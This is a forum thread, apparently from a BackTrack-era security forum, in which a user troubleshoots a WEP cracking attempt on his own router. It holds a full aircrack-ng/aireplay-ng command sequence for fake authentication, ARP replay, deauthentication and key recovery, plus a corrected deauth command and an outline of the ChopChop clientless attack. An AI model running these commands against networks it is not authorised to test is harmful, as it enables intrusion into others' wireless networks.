Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: Just Another WEP Cracking Problem :)

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Apr 2007
    Posts
    6

    Lightbulb Just Another WEP Cracking Problem :)

    Hi all,
    I really didn't wanted to post in this forum but I'm sorry I had no other choice
    I'll try my best to provide you all the information so its easier for your to give a suggestion.

    Hardware In-Use
    Machine: Compaq Evo N800
    Wireless Card: WG511T
    Router: WGR614v6

    Method of Attack
    Quote Originally Posted by BlayzeX
    I open up 4 windows

    In window 1
    1) airmon-ng stop ath0
    2) arimon-ng start wifi0 <--restarts ath0 in monitor mode-->
    3) airodump-ng -c <channel> -w <file> ath0

    In window 2
    1) aireplay-ng -1 30 -e <AP Name> -a <Router Mac> -h <Fake mac> ath0

    In window 3 <--make sure that the fake mac you use is listed on window 1 with the router-->
    1) aireplay-ng -3 -b <Router Mac> -h <Fake mac> -x 900 ath0

    In window 4
    1) aireplay-ng -0 10 -a <Router Mac> -h <Fake Mac> ath0 <--you may have to use this command a couple of times to deauth the mac, but usually it works-->

    once you see your data packets increasing then just wait, you don't need to use the deauth command again... now once you have the amount you think is enough you can use this command in this (window 4) same window

    2) aircrack-ng -x -0 <FILE> <--this is the file you named above, realize it will add a -01 to the name. Example. In Window 1 you chose the file name to be CAPTURE, then here you would use CAPTURE-01.CAP or... just use CAPTURE*.CAP --->
    failed authentication?
    • In window 1, Everything works great.
    • In window 2, Airplay starts and after a while displays the happy sign [:-)] with a successful authentication message and sends Keep-Alive packet. But it doesn't last too long. I mean it would go on for about a minute or two and then just stop, giving me a variety of reasons for its failure but when I try again it gives me the happy sign. Now I assume this is a failed authentication, as it should have continued sending alive packects.


    What's odd is the fact that I have no MAC filtering set on my router and yet I can't successfully authenticate. Any ideas what could possibly be the reason? or should I just try a completely different method?

  2. #2
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705

    Default

    What does the Aircrack-ng Documentation say?
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  3. #3
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    2 things come to mind...

    1.
    Go to the tutorial section, I have 2 varieties of WEP cracking methods to chose from. Follow them to a T and you wont fail.

    2. Are you doing clientless attack or client deauth attack?? Cause from above..." In window 4
    1) aireplay-ng -0 10 -a <Router Mac> -h <Fake Mac> ath0 <--you may have to use this command a couple of times to deauth the mac, but usually it works-->

    That suggest your deauthing a client with the -0 option, yet..it says -h <Fake MAC>...you don't use a faked mac address here..you use the connected clients MAC address here and the option is not -h...its -c so it would look like this...

    aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

    Follow a real tutorial...see my video in the tutorial section for clientless attacks.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  4. #4
    Member
    Join Date
    May 2007
    Posts
    138

    Default

    He's deauthing himself isn't he?!!!

    He says he's only using one computer, and one wireless card, so presumably he is...coupled with the fact that he's deauthing his Fake MAC of course.

    I like the listing about the router model though, it inspires confidence that he's legitimate anyway...if only everyone did that we'd have a clearer idea about those with illegal intentions.

    Sorry to talk about you, rather than to you, efrancesco...follow Xploitz's videos and you'll be fine

  5. #5
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by TrialAndError View Post
    He's deauthing himself isn't he?!!!

    He says he's only using one computer, and one wireless card, so presumably he is...coupled with the fact that he's deauthing his Fake MAC of course.

    ...follow Xploitz's videos and you'll be fine
    Sounds like he is deauthing himself...which is pointless in a clientless attack. If you deauth yourself using the -0 option... its defeating the purpose of a clientless attack..lol But if hes deauthing another client thats already established connection..then the -0 option is MANDATORY. Sounds like hes trying to do a clientless attack, but hes following a client connected tutorial and mixing up the attack methods...lol
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  6. #6
    Member
    Join Date
    May 2007
    Posts
    138

    Default

    efrancesco: As I'm reasonably sure you are acting legitimately may I suggest that you follow this video tutorial by Xploitz:
    http://forums.remote-exploit.org/showthread.php?t=7872
    And feel free to ask any questions you need about how to achieve it here.

    It's slightly different from the method you have been using but if you follow it closely then you should be successful

  7. #7
    Just burned his ISO
    Join Date
    Apr 2007
    Posts
    6

    Default

    PrairieFire, Thanks for pointing out to the resource. Actually its through the aircrack-ng documentation that I was able to determine that its indeed a failed authentication problem but they didn't offer any help on how to resolve the issue. I tried the tcpdump method, it sort of solved it but it wasn't too long before it returned.

    --=Xploitz=--, Man I've been reading so many post that you have made on this forum but its really the first time I get to say thanks for helping me out here and, indirectly, with all other problems I never posted

    TrialAndError, Thanks man that video got me through
    I couldn't find the links to the other video on wep cracking from Xploitz, I did however to get the WPA one. Is that video still avaliable?

    Now, if I may give you this last bit of trouble, I have a good idea of Fake Deauth and KoreK method. Thanks widely to the paper written by Fluhrer, Mantin and Shamir's on cracking WEP but I'm still not sure about the clientless attack. Any good resources out there that you can point me to? and, finally, is there like a website or something that keeps track of all the wep/wpa cracking techniques or is it just scrambled all over the internet?


    Once again thanks to all of you!!!

  8. #8
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  9. #9
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    i can upload the bundle on my ftp if you want

    a big file AIO

    or all files as you want .... but non online playing available only dl
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  10. #10
    Member
    Join Date
    May 2007
    Posts
    138

    Default

    TrialAndError, Thanks man that video got me through
    Thank Xploitz, he made it!
    I'm still not sure about the clientless attack. Any good resources out there that you can point me to?
    Xploitz's videos will give you all the info you'll need, for a clientless attack check out Video #2...the ChopChop attack will give you the keystream you need to forge an ARP packet, then send that to the AP to generate IVs to use in Aircrack.
    finally, is there like a website or something that keeps track of all the wep/wpa cracking techniques or is it just scrambled all over the internet?
    You're looking at it! It's a bit ad hoc but using the search function and the odd keyword will help you find everything you need. I prefer to use Google to search these forums as it usually gives better results than the actual forum search. Just stick "KEYWORD site:http://forums.remote-exploit.org/" into Google and it'll focus it's search solely on these forums

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •